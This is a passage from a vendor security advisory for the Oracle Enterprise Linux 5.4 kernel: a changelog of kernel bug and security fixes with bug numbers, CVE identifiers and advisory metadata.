miscelaneous device for ioctls (Ian Kent ) [452120]\n- [fs] autofs4: devicer node ioctl docoumentation (Ian Kent ) [452120]\n- [fs] autofs4: track uid and gid of last mount requester (Ian Kent ) [452120]\n- [nfs] memory corruption in nfs3_xdr_setaclargs (Sachin S. 
Prabhu ) [479432]\n- [misc] cpuset: attach_task fixes (KII Keiichi ) [471634]\n- [s390] dasd: fix race in dasd timer handling (Hans-Joachim Picht ) [490128]\n- [x86] use [ml]fence to synchronize rdtsc (Chris Lalancette ) [448588]\n- [xen] silence MMCONFIG warnings (Chris Lalancette ) [462572]\n- [xen] fix occasional deadlocks in Xen netfront (Chris Lalancette ) [480939]\n- [xen] fix crash when modprobe xen-vnif in a KVM guest (Chris Lalancette ) [487691]\n- [xen] xen reports bogus LowTotal (Chris Lalancette ) [428892]\n- [xen] wait 5 minutes for device connection (Chris Lalancette ) [396621]\n- [xen] only recover connected devices on resume (Chris Lalancette ) [396621]\n- [xen] ia64: fix bad mpa messages (Chris Lalancette ) [288511]\n- [net] handle non-linear packets in skb_checksum_setup (Herbert Xu ) [477012]\n- [fs] fix __page_symlink to be kabi friendly (Josef Bacik ) [445433]\n- [fs] ext3: convert to new aops (Josef Bacik ) [445433]\n- [mm] make new aops kABI friendly (Josef Bacik ) [445433]\n- [fs] fix symlink allocation context (Josef Bacik ) [445433]\n- [mm] iov_iter_advance fix, dont go off the end (Josef Bacik ) [445433]\n- [mm] fix infinite loop with iov_iter_advance (Josef Bacik ) [445433]\n- [mm] restore the KERNEL_DS optimisations (Josef Bacik ) [445433]\n- [gfs2] remove generic aops stuff (Josef Bacik ) [445433]\n- [fs] new cont helpers (Josef Bacik ) [445433]\n- [mm] introduce new aops, write_begin and write_end (Josef Bacik ) [445433]\n- [fs] splice: dont do readpage (Josef Bacik ) [445433]\n- [fs] splice: dont steal pages (Josef Bacik ) [445433]\n- [gfs2] remove static iov iter stuff (Josef Bacik ) [445433]\n- [mm] iov_iter helper functions (Josef Bacik ) [445433]\n- [mm] fix pagecache write deadlocks (Josef Bacik ) [445433]\n- [mm] write iovec cleanup (Josef Bacik ) [445433]\n- [mm] fix other users of __grab_cache_page (Josef Bacik ) [445433]\n- [mm] cleanup page caching stuff (Josef Bacik ) [445433]\n- [mm] cleanup error handling (Josef Bacik ) 
[445433]\n- [mm] clean up buffered write code (Josef Bacik ) [445433]\n- [mm] revert deadlock on vectored write fix (Josef Bacik ) [445433]\n- [mm] kill the zero-length iovec segments handling (Josef Bacik ) [445433]\n- [mm] revert KERNEL_DS buffered write optimisation (Josef Bacik ) [445433]\n- [mm] clean up pagecache allocation (Josef Bacik ) [445433]\n- [x86] move pci_video_fixup to later in boot (Prarit Bhargava ) [467785]\n- [usb] net: dm9601: upstream fixes for 5.4 (Ivan Vecera ) [471800]\n- [xen] ia64: fix FP emulation in a PV domain (Chris Lalancette ) [477098]\n- [xen] ia64: make sure guest pages dont change (Chris Lalancette ) [477098]\n- [xen] improve handle_fpu_swa (Chris Lalancette ) [477098]\n- [xen] ia64: fix windows 2003 BSOD (Chris Lalancette ) [479923]\n- [xen] x86: fix dom0 panic when using dom0_max_vcpus (Chris Lalancette ) [485119]\n- [xen] x86: silence WRMSR warnings (Chris Lalancette ) [470035]\n[2.6.18-136.el5]\n- Revert: [x86_64] fix gettimeoday TSC overflow issue (Prarit Bhargava ) [467942]\n- [ptrace] audit_syscall_entry to use right syscall number (Jiri Pirko ) [488002] {CVE-2009-0834}\n- [md] dm: check log bitmap will fit within the log device (Milan Broz ) [471565]\n- [nfs] add 'lookupcache' mount option for nfs shares (Sachin S. Prabhu ) [489285]\n- [nfs] add fine grain control for lookup cache in nfs (Sachin S. 
Prabhu ) [489285]\n- [net] tulip: MTU problems with 802.1q tagged frames (Ivan Vecera ) [484796]\n- [net] rtnetlink: fix sending message when replace route (Jiri Pirko ) [462725]\n- [s390] sclp: handle zero-length event buffers (Hans-Joachim Picht ) [487695]\n- [s390] dasd: DASDFMT not operating like CPFMTXA (Hans-Joachim Picht ) [484836]\n- [xen] fix blkfront bug with overflowing ring (Chris Lalancette ) [460693]\n- [net] ipv6: disallow IPPROTO_IPV6-level IPV6_CHECKSUM (Jiri Pirko ) [486204]\n- [ide] fix interrupt flood at startup w/ESB2 (James Paradis ) [438979]\n- [s390] cio: Properly disable not operational subchannel (Hans-Joachim Picht ) [487701]\n- [misc] kernel-headers: add serial_reg.h (Don Zickus ) [463538]\n[2.6.18-135.el5]\n- [s390] iucv: failing cpu hot remove for inactive iucv (Hans-Joachim Picht ) [485412]\n- [s390] dasd: fix waitqueue for sleep_on_immediatly (Hans-Joachim Picht ) [480161]\n- [ide] increase timeouts in wait_drive_not_busy (Stanislaw Gruszka ) [464039]\n- [x86_64] mce: do not clear an unrecoverable error status (Aristeu Rozanski ) [489692]\n- [wireless] iwlwifi: booting with RF-kill switch enabled (John W. Linville ) [482990]\n- [net] put_cmsg: may cause application memory overflow (Jiri Pirko ) [488367]\n- [x86_64] fix gettimeoday TSC overflow issue (Prarit Bhargava ) [467942]\n- [net] ipv6: check hop limit setting in ancillary data (Jiri Pirko ) [487406]\n- [net] ipv6: check outgoing interface in all cases (Jiri Pirko ) [486215]\n- [acpi] disable GPEs at the start of resume (Matthew Garrett ) [456302]\n- [crypto] include crypto headers in kernel-devel (Neil Horman ) [470929]\n- [net] netxen: rebase for RHEL-5.4 (tcamuso@redhat.com ) [485381]\n- [misc] signal: modify locking to handle large loads (AMEET M. 
PARANJAPE ) [487376]\n- [kexec] add ability to dump log from vmcore file (Neil Horman ) [485308]\n- [fs] ext3: handle collisions in htree dirs (Eric Sandeen ) [465626]\n- [acpi] use vmalloc in acpi_system_read_dsdt (Prarit Bhargava ) [480142]\n- [misc] make ioctl.h compatible with userland (Jiri Pirko ) [473947]\n- [nfs] sunrpc: add sv_maxconn field to svc_serv (Jeff Layton ) [468092]\n- [nfs] lockd: set svc_serv->sv_maxconn to a better value (Jeff Layton ) [468092]\n- [mm] decrement reclaim_in_progress after an OOM kill (Larry Woodman ) [488955]\n- [misc] sysrq-t: display backtrace for runnable processes (Anton Arapov ) [456588]\n[2.6.18-134.el5]\n- [dlm] fix length calculation in compat code (David Teigland ) [487672]\n- [net] ehea: remove adapter from list in error path (AMEET M. PARANJAPE ) [488254]\n- [x86] reserve low 64k of memory to avoid BIOS corruption (Matthew Garrett ) [471851]\n- [nfs] fix hung clients from deadlock in flush_workqueue (David Jeffery ) [483627]\n- [net] fix a few udp counters (Neil Horman ) [483266]\n- [ia64] use current_kernel_time/xtime in hrtimer_start() (Prarit Bhargava ) [485323]\n- [sata] libata: ahci withdraw IGN_SERR_INTERNAL for SB800 (David Milburn ) [474301]\n- [ata] libata: iterate padded atapi scatterlist (David Milburn ) [446086]\n- [x86] TSC keeps running in C3+ (Luming Yu ) [474091]\n- [acpi] fix C-states less efficient on certain machines (Luming Yu ) [484174]\n- [net] ipv6: fix getsockopt for sticky options (Jiri Pirko ) [484105 483790]\n- [ppc64] cell spufs: update to the upstream for RHEL-5.4 (AMEET M. PARANJAPE ) [475620]\n- [ppc64] cell: fix npc setting for NOSCHED contexts (AMEET M. PARANJAPE ) [467344]\n- [ppc64] handle null iommu dma-window property correctly (AMEET M. 
PARANJAPE ) [393241]\n- [net] e1000, bnx2: enable entropy generation (Ivan Vecera ) [439898]\n- Revert: [xen] console: make LUKS passphrase readable (Bill Burns ) [475986]\n- [gfs2] add UUID to gfs2 super block (Steven Whitehouse ) [242696]\n- [x86] consistent time options for x86_64 and i386 (Prarit Bhargava ) [475374]\n- [xen] allow > 4GB EPT guests on i386 (Chris Lalancette ) [478522]\n- [xen] clear screen to make LUKS passphrase visible (Bill Burns ) [475986]\n[2.6.18-133.el5]\n- [net] fix oops when using openswan (Neil Horman ) [484590]\n- [net] bonding: fix arp_validate=3 slaves behaviour (Jiri Pirko ) [484304]\n- [serial] 8250: fix boot hang when using with SOL port (Mauro Carvalho Chehab ) [467124]\n- [usb] sb600/sb700: workaround for hang (Pete Zaitcev ) [471972]\n- [gfs2] make quota mount option consistent with gfs (Bob Peterson ) [486168]\n- [xen] pv-block: remove anaconda workaround (Don Dutile ) [477005]\n- [ppc64] power7: fix /proc/cpuinfo cpus info (AMEET M. PARANJAPE ) [486649]\n- [net] skfp_ioctl inverted logic flaw (Eugene Teo ) [486540] {CVE-2009-0675}\n- [net] memory disclosure in SO_BSDCOMPAT gsopt (Eugene Teo ) [486518] {CVE-2009-0676}\n- [net] enic: upstream update to version 1.0.0.933 (Andy Gospodarek ) [484824]\n- [mm] cow vs gup race fix (Andrea Arcangeli ) [471613]\n- [mm] fork vs gup race fix (Andrea Arcangeli ) [471613]\n- [gfs2] parsing of remount arguments incorrect (Bob Peterson ) [479401]\n- [ppc64] eeh: disable/enable LSI interrupts (AMEET M. PARANJAPE ) [475696]\n- [x86] limit max_cstate to use TSC on some platforms (Tony Camuso ) [470572]\n- [ptrace] correctly handle ptrace_update return value (Jerome Marchand ) [483814]\n- [dlm] fix plock notify callback to lockd (David Teigland ) [470074]\n- [input] wacom: 12x12 problem while using lens cursor (Aristeu Rozanski ) [484959]\n- [wireless] ath5k: update to F10 version (Michal Schmidt ) [479049]\n- [xen] disable suspend in kernel (Justin M. 
Forbes ) [430928]\n- [net] ipv6: update setsockopt to support RFC 3493 (Jiri Pirko ) [484971]\n- [net] ipv6: check length of userss optval in setsockopt (Jiri Pirko ) [484977]\n- [scsi] handle work queue and shost_data setup failures (mchristi@redhat.com ) [450862]\n- [net] skbuff: fix oops in skb_seq_read (mchristi@redhat.com ) [483285]\n- [net] sky2: update driver for RHEL-5.4 (Neil Horman ) [484712]\n- [net] ipv6: Hop-by-Hop options header returned bad value (Jiri Pirko ) [483793]\n- [pci] fix MSI descriptor leak during hot-unplug (James Paradis ) [484943]\n- [net] improve udp port randomization (Vitaly Mayatskikh ) [480951]\n- [misc] ia64, s390: add kernel version to panic output (Prarit Bhargava ) [484403]\n- [x86-64] fix int $0x80 -ENOSYS return (Vitaly Mayatskikh ) [481682]\n- [net] dont add NAT extension for confirmed conntracks (Herbert Xu ) [481076]\n- [xen] fbfront dirty race (Markus Armbruster ) [456893]\n- [net] ehea: improve behaviour in low mem conditions (AMEET M. PARANJAPE ) [483148]\n- [net] fix icmp_send and icmpv6_send host re-lookup code (Jiri Pirko ) [439670]\n- [scsi] ibmvscsi: N-Port-ID support on ppc64 (AMEET M. PARANJAPE ) [474701]\n- [xen] guest crash when host has >= 64G RAM (Rik van Riel ) [448115]\n- [ppc] cell: add support for power button on blades (AMEET M. PARANJAPE ) [475658]\n- [ppc64] serial_core: define FIXED_PORT flag (AMEET M.
PARANJAPE ) [475621]\n- [s390] cio: I/O error after cable pulls 2 (Hans-Joachim Picht ) [479878]\n- [misc] ptrace, utrace: fix blocked signal injection (Jerome Marchand ) [451849]\n- [xen] irq: remove superfluous printk (Rik van Riel ) [456095]\n- [s390] qeth: print HiperSocket version on z9 and later (Hans-Joachim Picht ) [479881]\n- [s390] qeth: crash in case of layer mismatch for VSWITCH (Hans-Joachim Picht ) [476205]\n- [s390] qdio: only 1 buffer in INPUT_PROCESSING state (Hans-Joachim Picht ) [479867]\n- [s390] disable cpu topology support by default (Hans-Joachim Picht ) [475797]\n- [s390] qeth: unnecessary support ckeck in sysfs route6 (Hans-Joachim Picht ) [474469]\n- [s390] cio: ccwgroup online vs. ungroup race condition (Hans-Joachim Picht ) [479879]\n- [s390] dasd: dasd_device_from_cdev called from interrupt (Hans-Joachim Picht ) [474806]\n- [misc] minor signal handling vulnerability (Oleg Nesterov ) [479964] {CVE-2009-0028}\n[2.6.18-132.el5]\n- [firmware] dell_rbu: prevent oops (Don Howard ) [482942]\n- [fs] lockd: improve locking when exiting from a process (Peter Staubach ) [448929]\n- [misc] backport RUSAGE_THREAD support (Jerome Marchand ) [451063]\n- [gfs2] panic in debugfs_remove when unmounting (Abhijith Das ) [483617]\n- [nfs] memory corruption in nfs3_xdr_setaclargs (Sachin S. Prabhu ) [479432]\n- [nfs] fix hangs during heavy write workloads (Peter Staubach ) [469848]\n- [pci] msi: set 'En' bit for devices on HT-based platform (Andy Gospodarek ) [290701]\n- [net] ipt_REJECT: properly handle IP options (Ivan Vecera ) [473504]\n- [ppc] cell: fix GDB watchpoints (AMEET M. PARANJAPE ) [480239]\n- [edac] add i5400 driver (Mauro Carvalho Chehab ) [462895]\n- [xen] fix disappearing PCI devices from PV guests (Bill Burns ) [233801]\n- [net] s2io: flush statistics when changing the MTU (AMEET M. 
PARANJAPE ) [459514]\n- [scsi] no-sense msgs, data corruption, but no i/o errors (Rob Evers ) [468088]\n- [powerpc] wait for a panic_timeout > 0 before reboot (AMEET M. PARANJAPE ) [446120]\n- [ppc64] cell: axon-msi: Retry on missing interrupt (AMEET M. PARANJAPE ) [472405]\n- [ppc] MSI interrupts are unreliable on IBM QS21 and QS22 (AMEET M. PARANJAPE ) [472405]\n- [crypto] des3_ede: permit weak keys unless REQ_WEAK_KEY (Jarod Wilson ) [474394]\n- [ata] JMB361 only has one port (Prarit Bhargava ) [476206]\n- [net] r8169: disable the ability to change MAC address (Ivan Vecera ) [475867]\n- [misc] futex.h: remove kernel bits for userspace header (Anton Arapov ) [475790]\n- [fs] inotify: send IN_ATTRIB event on link count changes (Eric Paris ) [471893]\n- [misc] ppc64: large sends fail with unix domain sockets (Larry Woodman ) [461312]\n- [audit] misc kernel fixups (Alexander Viro ) [475330]\n- [audit] records for descr created by pipe and socketpair (Alexander Viro ) [475278]\n- [audit] control character detection is off-by-one (Alexander Viro ) [475150]\n- [audit] fix kstrdup error check (Alexander Viro ) [475149]\n- [audit] assorted audit_filter_task panics on ctx == NULL (Alexander Viro ) [475147]\n- [audit] increase AUDIT_MAX_KEY_LEN (Alexander Viro ) [475145]\n- [nfs] race with nfs_access_cache_shrinker() and umount (Peter Staubach ) [469225]\n- [nfs] lockd: handle long grace periods correctly (Peter Staubach ) [474590]\n- [crypto] ansi_cprng: fix inverted DT increment routine (Jarod Wilson ) [471281]\n- [crypto] ansi_cprng: extra call to _get_more_prng_bytes (Jarod Wilson ) [471281]\n- [fs] proc: Proportional Set Size calculation and display (Larry Woodman ) [471969]\n- [video] avoid writing outside shadow.bytes array (Mauro Carvalho Chehab ) [471844]\n- [fs] need locking when reading /proc/\n/oom_score (Larry Woodman ) [470459]\n- [x86] memmap=X does not yield new map (Prarit Bhargava ) [464500]\n- [s390] qeth: avoid problems after failing recovery 
(Hans-Joachim Picht ) [468019]\n- [s390] qeth: avoid skb_under_panic for bad inbound data (Hans-Joachim Picht ) [468075]\n- [s390] sclp: incorrect softirq disable/enable (Hans-Joachim Picht ) [468021]\n- [crypto] export DSA_verify as a gpl symbol (Jarod Wilson ) [470111]\n- [s390] lcs: output request completion with zero cpa val (Hans-Joachim Picht ) [463165]\n- [s390] dasd: oops when Hyper PAV alias is set online (Hans-Joachim Picht ) [458155]\n- [s390] ipl: file boot then boot from alt dev wont work (Hans-Joachim Picht ) [458115]\n- [s390] zfcp: remove messages flooding the kernel log (Hans-Joachim Picht ) [455260]\n- [snd] fix snd-sb16.ko compile (Prarit Bhargava ) [456698]\n[2.6.18-131.el5]\n- [scsi] libata: sas_ata fixup sas_sata_ops (David Milburn ) [483171]\n- [fs] ecryptfs: readlink flaw (Eric Sandeen ) [481607] {CVE-2009-0269}\n- [crypto] ccm: fix handling of null assoc data (Jarod Wilson ) [481031]\n- [misc] fix leap second hang (Prarit Bhargava ) [479765]\n- [qla2xxx] correct endianness during flash manipulation (Marcus Barrow ) [481691]\n- [net] gso: ensure that the packet is long enough (Jiri Pirko ) [479927]\n- [audit] remove bogus newlines in EXECVE audit records (Jiri Pirko ) [479412]\n- [ppc] dont reset affinity for secondary MPIC on boot (AMEET M. 
PARANJAPE ) [480801]\n- [nfs] knfsd: alloc readahead cache in individual chunks (Jeff Layton ) [459397]\n- [nfs] knfsd: read-ahead cache, export table corruption (Jeff Layton ) [459397]\n- [nfs] knfsd: replace kmalloc/memset with kcalloc (Jeff Layton ) [459397]\n- [nfs] knfsd: make readahead params cache SMP-friendly (Jeff Layton ) [459397]\n- [crypto] fix sha384 blocksize definition (Neil Horman ) [469167]\n[2.6.18-130.el5]\n- [security] keys: introduce missing kfree (Jiri Pirko ) [480598] {CVE-2009-0031}\n- [net] ixgbe: frame reception and ring parameter issues (Andy Gospodarek ) [475625]\n- [net] tcp-lp: prevent chance for oops (Ivan Vecera ) [478638]\n- [misc] fix memory leak during pipe failure (Benjamin Marzinski ) [478643]\n- [block] enforce a minimum SG_IO timeout (Eugene Teo ) [475406] {CVE-2008-5700}\n- [x86] pci domain: re-enable support on blacklisted boxes (Prarit Bhargava ) [474891]\n- [fs] link_path_walk sanity, stack usage optimization (Anton Arapov ) [470139]\n- [x86_64] incorrect cpu_khz calculation for AMD processor (Prarit Bhargava ) [467782]\n- [crypto] fips: panic kernel if we fail crypto self tests (Neil Horman ) [462909]\n- [genkey] increase signing key length to 1024 bits (Neil Horman ) [413241]\n- [x86] kdump: lockup when crashing with console_sem held (Neil Horman ) [456934]\n- [fs] ext[234]: directory corruption DoS (Eugene Teo ) [459604] {CVE-2008-3528}\n[2.6.18-129.el5]\n- [gfs2] mount attempt hangs if no more journals available (Bob Peterson ) [475312]\n- [sched] fix clock_gettime monotonicity (Peter Zijlstra ) [477763]\n- [nfs] create rpc clients with proper auth flavor (Jeff Layton ) [465456]\n- [nfs] handle attribute timeout and u32 jiffies wrap (Jeff Layton ) [460133]\n- [net] deadlock in Hierarchical token bucket scheduler (Neil Horman ) [474797]\n- [net] sctp: overflow with bad stream ID in FWD-TSN chunk (Eugene Teo ) [478805] {CVE-2009-0065}\n- [md] fix oops with device-mapper mirror target (Heinz Mauelshagen ) [472558]\n- 
[openib] restore traffic in connected mode on HCA (AMEET M. PARANJAPE ) [477000]\n- [net] add preemption point in qdisc_run (Jiri Pirko ) [471398] {CVE-2008-5713}\n- [wireless] iwl: fix BUG_ON in driver (Neil Horman ) [477671]\n- [x86_64] copy_user_c assembler can leave garbage in rsi (Larry Woodman ) [456682]\n- [misc] setpgid returns ESRCH in some situations (Oleg Nesterov ) [472433]\n- [s390] zfcp: fix hexdump data in s390dbf traces (Hans-Joachim Picht ) [470618]\n- [fs] hfsplus: fix buffer overflow with a corrupted image (Anton Arapov ) [469638] {CVE-2008-4933}\n- [fs] hfsplus: check read_mapping_page return value (Anton Arapov ) [469645] {CVE-2008-4934}\n- [fs] hfs: fix namelength memory corruption (Anton Arapov ) [470773] {CVE-2008-5025}\n- [net] netlink: fix overrun in attribute iteration (Eugene Teo ) [462283]", "cvss3": {}, "published": "2009-09-08T00:00:00", "type": "oraclelinux", "title": "Oracle Enterprise Linux 5.4 kernel security and bug fix update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2009-2692", "CVE-2009-1385", "CVE-2008-5700", "CVE-2008-3528", "CVE-2008-5713", "CVE-2009-0675", "CVE-2009-0747", "CVE-2009-0746", "CVE-2009-2698", "CVE-2009-0028", "CVE-2009-1072", "CVE-2009-0676", "CVE-2009-1192", "CVE-2008-5025", "CVE-2009-0065", "CVE-2009-0745", "CVE-2009-2407", "CVE-2008-4933", "CVE-2009-1337", "CVE-2007-5966", "CVE-2009-1388", "CVE-2009-0269", "CVE-2009-1389", "CVE-2009-0834", "CVE-2009-1633", "CVE-2009-0748", "CVE-2009-0031", "CVE-2009-2406", "CVE-2009-1439", "CVE-2009-2848", "CVE-2009-1897", "CVE-2007-3719", "CVE-2008-4934", "CVE-2009-1630", "CVE-2009-2847"], "modified": "2009-09-08T00:00:00", "id": "ELSA-2009-1243", "href": "http://linux.oracle.com/errata/ELSA-2009-1243.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}